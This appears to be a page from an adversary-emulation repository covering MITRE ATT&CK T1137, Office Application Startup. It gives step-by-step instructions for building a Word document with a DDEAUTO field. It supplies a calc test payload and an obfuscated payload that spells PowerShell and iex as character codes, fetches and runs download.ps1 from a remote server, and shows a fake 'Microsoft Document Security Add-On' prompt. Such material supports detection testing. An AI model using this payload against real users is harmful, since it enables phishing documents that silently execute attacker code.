Michael Haag
aee2840fd5
+ Office Application Startup -- Added DDEAUTO and Dragon's Tail link + Registry Run Keys and Start Folder -- Added a couple of items to make this interesting. +Updated Windows Readme
1.2 KiB
1.2 KiB
Office Application Startup
MITRE ATT&CK Technique: T1137
DDEAUTO
- Open Word
- Insert tab -> Quick Parts -> Field
- Choose = (Formula) and click ok.
- Once the field is inserted, you should now see "!Unexpected End of Formula"
- Right-click the Field, choose "Toggle Field Codes"
- Paste in the code from Unicorn or SensePost
- Save the Word document.
-
DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe"
Generate the payload and download.ps1 following the Unicorn instructions, or to make one "just work", follow the steps below.
DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\windows\\system32\\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\\v1.0\\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString('http://<server>/download.ps1'); # " "Microsoft Document Security Add-On"